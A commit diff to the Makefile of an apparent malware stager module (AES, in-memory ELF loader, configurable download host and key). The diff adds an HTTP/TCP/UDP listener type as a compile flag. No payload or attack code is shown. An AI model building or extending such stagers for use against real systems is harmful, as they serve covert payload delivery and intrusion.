feat: implement TCP and UDP listener support and enhance download functionality

--- a/core/modules/stager/Makefile
+++ b/core/modules/stager/Makefile
@@ -4,8 +4,11 @@ TINF_SRC = adler32.c crc32.c tinfgzip.c tinflate.c tinfzlib.c tinf.h
 # Update the list of source files
 SRC = stager.c aes.c elf_loader.c $(TINF_SRC)
 
+# Listener type: HTTP, TCP, or UDP (default: HTTP)
+LISTENER_TYPE ?= HTTP
+
 # Configure the download server via environment variables
-CFLAGS += -DGOARCH_$(ARCH) -DDOWNLOAD_HOST=\"$(DOWNLOAD_HOST)\" -DDOWNLOAD_PORT=\"$(DOWNLOAD_PORT)\" -DDOWNLOAD_PATH=\"$(DOWNLOAD_PATH)\" -DDOWNLOAD_KEY=\"$(DOWNLOAD_KEY)\"
+CFLAGS += -DGOARCH_$(ARCH) -DDOWNLOAD_HOST=\"$(DOWNLOAD_HOST)\" -DDOWNLOAD_PORT=\"$(DOWNLOAD_PORT)\" -DDOWNLOAD_PATH=\"$(DOWNLOAD_PATH)\" -DDOWNLOAD_KEY=\"$(DOWNLOAD_KEY)\" -DLISTENER_$(LISTENER_TYPE)
 
 stager_so:
 	${CC} ${CFLAGS} -DOS_LINUX -DLINUX_SO $(SRC) -o stager.so -fPIC -shared -ldl -nostdlib -nodefaultlibs -s
